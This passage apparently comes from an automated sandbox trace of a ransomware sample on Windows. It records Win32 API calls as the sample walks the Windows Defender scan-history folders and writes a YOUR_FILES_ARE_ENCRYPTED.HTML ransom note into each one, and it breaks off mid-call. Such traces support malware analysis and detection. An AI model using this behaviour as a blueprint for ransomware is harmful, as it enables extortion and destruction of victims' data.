[0107.509] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory" [0107.509] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\*" [0107.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626638 [0107.511] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0107.511] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="00", cAlternateFileName="")) returned 1 [0107.511] StrStrIW (lpFirst="00", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.511] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00") returned 79 [0107.511] GetProcessHeap () returned 0x600000 [0107.511] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.512] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00" [0107.512] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\*" [0107.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.513] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.513] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="192", cAlternateFileName="")) returned 1 [0107.513] StrStrIW (lpFirst="192", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.513] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\192") returned 83 [0107.513] PathFindExtensionW (pszPath="192") returned="" [0107.513] lstrlenW (lpString="") returned 0 [0107.513] PathFindExtensionW (pszPath="192") returned="" [0107.513] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="192", cAlternateFileName="")) returned 0 [0107.513] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.513] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.513] GetProcessHeap () returned 0x600000 [0107.513] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\00\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\00\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.514] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.515] CloseHandle (hObject=0x308) returned 1 [0107.515] GetProcessHeap () returned 0x600000 [0107.515] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.515] GetProcessHeap () returned 0x600000 [0107.515] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.516] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="01", cAlternateFileName="")) returned 1 [0107.516] StrStrIW (lpFirst="01", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.516] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01") returned 79 [0107.516] GetProcessHeap () returned 0x600000 [0107.516] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.517] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01" [0107.517] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\*" [0107.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0107.518] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.518] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="198", cAlternateFileName="")) returned 1 [0107.518] StrStrIW (lpFirst="198", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.518] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\198") returned 83 [0107.518] PathFindExtensionW (pszPath="198") returned="" [0107.518] lstrlenW (lpString="") returned 0 [0107.518] PathFindExtensionW (pszPath="198") returned="" [0107.518] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="263", cAlternateFileName="")) returned 1 [0107.518] StrStrIW (lpFirst="263", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.519] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\263") returned 83 [0107.519] PathFindExtensionW (pszPath="263") returned="" [0107.519] lstrlenW (lpString="") returned 0 [0107.519] PathFindExtensionW (pszPath="263") returned="" [0107.519] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="271", cAlternateFileName="")) returned 1 [0107.519] StrStrIW (lpFirst="271", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.519] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\271") returned 83 [0107.519] PathFindExtensionW (pszPath="271") returned="" [0107.519] lstrlenW (lpString="") returned 0 [0107.519] PathFindExtensionW (pszPath="271") returned="" [0107.519] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="271", cAlternateFileName="")) returned 0 [0107.519] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0107.519] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.519] GetProcessHeap () returned 0x600000 [0107.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\01\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.520] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.521] CloseHandle (hObject=0x308) returned 1 [0107.521] GetProcessHeap () returned 0x600000 [0107.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.521] GetProcessHeap () returned 0x600000 [0107.521] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.522] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="02", cAlternateFileName="")) returned 1 [0107.522] StrStrIW (lpFirst="02", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.522] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02") returned 79 [0107.522] GetProcessHeap () returned 0x600000 [0107.522] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.523] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02" [0107.523] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\*" [0107.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x626738 [0107.524] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.524] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="100015", cAlternateFileName="")) returned 1 [0107.524] StrStrIW (lpFirst="100015", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.524] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\100015") returned 86 [0107.524] PathFindExtensionW (pszPath="100015") returned="" [0107.524] lstrlenW (lpString="") returned 0 [0107.524] PathFindExtensionW (pszPath="100015") returned="" [0107.524] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="109004", cAlternateFileName="")) returned 1 [0107.524] StrStrIW (lpFirst="109004", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.524] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\109004") returned 86 [0107.524] PathFindExtensionW (pszPath="109004") returned="" [0107.524] lstrlenW (lpString="") returned 0 [0107.524] PathFindExtensionW (pszPath="109004") returned="" [0107.524] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="303", cAlternateFileName="")) returned 1 [0107.524] StrStrIW (lpFirst="303", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.524] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\303") returned 83 [0107.524] PathFindExtensionW (pszPath="303") returned="" [0107.524] lstrlenW (lpString="") returned 0 [0107.524] PathFindExtensionW (pszPath="303") returned="" [0107.524] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="303", cAlternateFileName="")) returned 0 [0107.524] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0107.524] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.524] GetProcessHeap () returned 0x600000 [0107.524] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.525] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\02\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.525] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.526] CloseHandle (hObject=0x308) returned 1 [0107.527] GetProcessHeap () returned 0x600000 [0107.527] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.527] GetProcessHeap () returned 0x600000 [0107.527] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.527] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="03", cAlternateFileName="")) returned 1 [0107.528] StrStrIW (lpFirst="03", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.528] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03") returned 79 [0107.528] GetProcessHeap () returned 0x600000 [0107.528] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.529] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03" [0107.529] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\*" [0107.529] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.529] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: 